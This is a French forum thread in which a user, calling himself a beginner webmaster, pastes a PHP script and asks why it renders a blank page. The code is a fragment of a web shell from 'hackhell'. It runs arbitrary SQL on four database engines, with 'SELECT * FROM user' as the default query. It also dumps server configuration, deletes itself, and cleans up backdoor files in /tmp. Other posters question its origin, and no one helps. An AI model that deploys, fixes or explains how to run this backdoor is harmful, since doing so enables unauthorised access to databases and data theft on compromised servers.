PHP et MySql Fermé

Question

Bonjour, J'ai trouvé un script php pour MySql en open source sur un site mais j'arrive pas a le faire fonctionner, je tombe sur une page blanche a son éxécution et le mec qui la fait ne veut pas en dire plus et en tant que webmaster j'aimerais tester ça sur ma base de donnée. Aidez moi svp ! pourquoi j'ai une page blanche quand je le lance? $v) { $_POST[$k] = stripslashes($v); } foreach ($_SERVER as $k=>$v) { $_SERVER[$k] = stripslashes($v); } } $auth = 0; $name='flow'; $pass='WhatElse'; if($auth == 1) { if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass) { header('WWW-Authenticate: Basic realm="shell"'); header('HTTP/1.0 401 Unauthorized'); exit("www.hackhell.com : Access Denied"); } } $head = ' shell '; if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "

[ BACK ]

"; die(); } if ($_POST['cmd']=="db_query") { echo $head; switch($_POST['db']) { case 'MySQL': if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); if($db) { if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); } $querys = @explode(';',$_POST['db_query']); foreach($querys as $num=>$query) { if(strlen($query)>5){ echo "Query#".$num." : ".htmlspecialchars($query)."
"; $res = @mysql_query($query,$db); $error = @mysql_error($db); if($error) { echo "

Error : ".$error."

"; } else { if (@mysql_num_rows($res) > 0) { $sql2 = $sql = $keys = $values = ''; while (($row = @mysql_fetch_assoc($res))) { $keys = @implode("  ", @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} $values = @implode("  ",$values); $sql2 .= " ".$values." "; } echo ""; $sql = ""; $sql .= $sql2; echo $sql; echo "
".$keys."

"; } else { if(($rows = @mysql_affected_rows($db))>=0) { echo "
affected rows : ".$rows."

"; } } } @mysql_free_result($res); } } @mysql_close($db); } else echo "
Can't connect to MySQL server
"; break; case 'MSSQL': if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); if($db) { if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); } $querys = @explode(';',$_POST['db_query']); foreach($querys as $num=>$query) { if(strlen($query)>5){ echo "Query#".$num." : ".htmlspecialchars($query)."
"; $res = @mssql_query($query,$db); if (@mssql_num_rows($res) > 0) { $sql2 = $sql = $keys = $values = ''; while (($row = @mssql_fetch_assoc($res))) { $keys = @implode("  ", @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} $values = @implode("  ",$values); $sql2 .= " ".$values." "; } echo ""; $sql = ""; $sql .= $sql2; echo $sql; echo "
".$keys."

"; } /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "
affected rows : ".$rows."

"; } else { echo "
Error : ".$error."

"; }} */ @mssql_free_result($res); } } @mssql_close($db); } else echo "
Can't connect to MSSQL server
"; break; case 'PostgreSQL': if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; $db = @pg_connect($str); if($db) { $querys = @explode(';',$_POST['db_query']); foreach($querys as $num=>$query) { if(strlen($query)>5){ echo "Query#".$num." : ".htmlspecialchars($query)."
"; $res = @pg_query($db,$query); $error = @pg_errormessage($db); if($error) { echo "
Error : ".$error."

"; } else { if (@pg_num_rows($res) > 0) { $sql2 = $sql = $keys = $values = ''; while (($row = @pg_fetch_assoc($res))) { $keys = @implode("  ", @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} $values = @implode("  ",$values); $sql2 .= " ".$values." "; } echo ""; $sql = ""; $sql .= $sql2; echo $sql; echo "
".$keys."

"; } else { if(($rows = @pg_affected_rows($res))>=0) { echo "
affected rows : ".$rows."

"; } } } @pg_free_result($res); } } @pg_close($db); } else echo "
Can't connect to PostgreSQL server
"; break; case 'Oracle': $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']); if(($error = @ocierror())) { echo "
Can't connect to Oracle server.
".$error['message']."
"; } else { $querys = @explode(';',$_POST['db_query']); foreach($querys as $num=>$query) { if(strlen($query)>5) { echo "Query#".$num." : ".htmlspecialchars($query)."
"; $stat = @ociparse($db, $query); @ociexecute($stat); if(($error = @ocierror())) { echo "
Error : ".$error['message']."

"; } else { $rowcount = @ocirowcount($stat); if($rowcount != 0) {echo "
affected rows : ".$rowcount."

";} else { echo ""; for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo ""; } echo ""; while(ocifetch($stat)) { echo ""; for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo ""; } echo ""; } echo "
".htmlspecialchars(@ocicolumnname($stat, $j))."
".htmlspecialchars(@ociresult($stat, $j))."

"; } @ocifreestatement($stat); } } } @ocilogoff($db); } break; } echo "
"; echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cmd',0,'db_query'); echo "
".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user;"))."

"; echo "
"; echo "
[ BACK ]
"; die(); } if(isset($_GET['delete'])) { @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); } if(isset($_GET['tmp'])) { @unlink("/tmp/bdpl"); @unlink("/tmp/back"); @unlink("/tmp/bd"); @unlink("/tmp/bd.c"); @unlink("/tmp/dp"); @unlink("/tmp/dpc"); @unlink("/tmp/dpc.c"); } if(isset($_GET['phpini'])) { echo $head; function U_value($value) { if ($value == '') return 'no value'; if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; if ($value === null) return 'NULL'; if (@is_object($value)) $value = (array) $value; if (@is_array($value)) { @ob_start(); print_r($value); $value = @ob_get_contents(); @ob_end_clean(); } return U_wordwrap((string) $value); } function U_wordwrap($str) { $str = @wordwrap(@htmlspecialchars($str), 100, '', true); return @preg_replace('!(&[^;]*)([^;]*;)!', '$1$2', $str); } if (@function_exists('ini_get_all')) { $r = ''; echo '', ''; foreach (@ini_get_all() as $key=>$value) { $r .= ''; } echo $r; echo '
Directive
Local Value
Master Value
'.ws(3).''.$key.'
'.U_value($value['local_value']).'
'.U_value($value['global_value']).'
'; } echo "
[ BACK ]
"; die(); } if(isset($_GET['cpu'])) { echo $head; echo '
CPU
'; $cpuf = @file("cpuinfo"); if($cpuf) { $c = @sizeof($cpuf); for($i=0;$i<$c;$i++) { $info = @explode(":",$cpuf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= ''; } echo $r; } else { echo ''; } echo '
'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
---
'; echo "
[ BACK ]
"; die(); } if(isset($_GET['mem'])) { echo $head; echo '
MEMORY
'; $memf = @file("meminfo"); if($memf) { $c = sizeof($memf); for($i=0;$i<$c;$i++) { $info = explode(":",$memf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= ''; } echo $r; } else { echo ''; } echo '
'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
---
'; echo "
[ BACK ]
"; die(); } ?> Configuration: Linux / Safari 535.7

Melooo · Answer

Salut,
Vu la taille du code, explique nous à quoi sert ton code, parce que j'ai vraiment pas envie de me taper toutes les lignes :)

Stringman621 · Answer

Personnellement il n'y a qu'un truc qui m'a interpellé dans le sur-volage de ce code c'est ça : www.hackhell.com

En quoi consiste ton code ????

bastien · Answer

Coucou,


Apparemment c'est un code de gestion SQL multi plateforme(CMS), mais si je vous demande de l'aide c'est surtout pour avoir des précisions sur son utilité et comment je peux l'utiliser pour gérer ma base de donnée, je suis un webmaster débutant sinon je vous aurais pas posé question.

bastien · Answer

Vous avez pas une idée de comment je peux le lancer sans avoir de page blanche?

bastien · Answer

Une aide serait la bienvenue :)

bastien · Answer

Alloo

bastien · Answer

Un peu d'aide svp soyez sympa...

bastien · Answer

...

ohoh · Answer

bam dans tes dents

bastien · Answer

Le script n'est pas a moi je veux juste des renseignements sur ce qu'il fait.

Stringman621 · Answer

Ya un truc que je comprend pas, tu as pris un script au pif sur le net et tu nous demandes comment fonctionne-t-il ?

Mais, alors la question que je te pose pourquoi faire ça ? si tu ne sais pas ce que fait ce script quel est l'intérêt de vouloir l'utiliser...

bastien · Answer

@Stringman 

Car je suis webmaster et que je gère une base de donnée... et que ce script comporte des requetes SQL dont je ne comprends pas tout et j'aimerais savoir si ça peux mettre utille a moi aussi voila pourquoi.

bastien · Answer

Désoler d'etre nul =D

PHP et MySql

13 réponses

Discussions similaires